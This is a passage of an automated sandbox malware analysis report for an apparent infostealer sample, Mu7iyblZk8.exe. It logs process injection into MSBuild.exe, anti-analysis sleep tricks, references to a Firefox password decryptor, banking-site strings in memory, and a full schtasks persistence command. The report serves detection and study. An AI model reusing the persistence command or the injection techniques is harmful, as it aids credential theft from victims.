                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D6E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818DA04
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D6C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818DAA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D304
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D0E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D784
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D384
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D424
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818E654
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D3C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D924
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D2E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D7A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D664
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D744
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818F3F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818F314
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D1A4
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 47E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory allocated: 1190000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory allocated: 1ACC0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1280000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2BE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4BE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeWindow / User API: threadDelayed 615Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3912Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5633Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3776
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5913
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe TID: 7820Thread sleep count: 615 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe TID: 7824Thread sleep count: 97 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe TID: 7620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7976Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7976Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7980Thread sleep count: 3912 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7980Thread sleep count: 5633 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8008Thread sleep count: 150 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4020Thread sleep count: 47 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4020Thread sleep time: -43349848573217419s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4292Thread sleep count: 3776 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4292Thread sleep count: 5913 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4580Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4244Thread sleep count: 58 > 30
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC28000.00000004.00000020.00020000.00000000.sdmp, Mu7iyblZk8.exe, 00000000.00000002.1404302143.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp, WareHouse.exe, 0000000A.00000002.1464504535.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, WareHouse.exe, 0000000A.00000002.1466432583.000000001BBCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3814383672.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3814384925.0000000001027000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3862598704.0000000007570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                  Source: MSBuild.exe, 00000003.00000002.3845308385.0000000006690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261D238 LdrInitializeThunk,3_2_0261D238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, ParentProcessUtil.csReference to suspicious API methods: NativeMethods.OpenProcess(PROCESS_QUERY_INFORMATION, bInheritHandle: false, (uint)id)
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: KernelLoadLibrary64(GeckoResourcePath + "nss3.dll")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(NSS3, "NSS_Init")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "VirtualProtectEx")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "WriteProcessMemory")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, HeavensGateProcessor.csReference to suspicious API methods: NativeMethods.ReadProcessMemory(lpTargetHandle, (uint)processParameters, intPtr, (uint)Marshal.SizeOf(typeof(ulong)), ref lpNumberOfBytesRead)
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 74F008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C7E008
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /fJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUIDJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
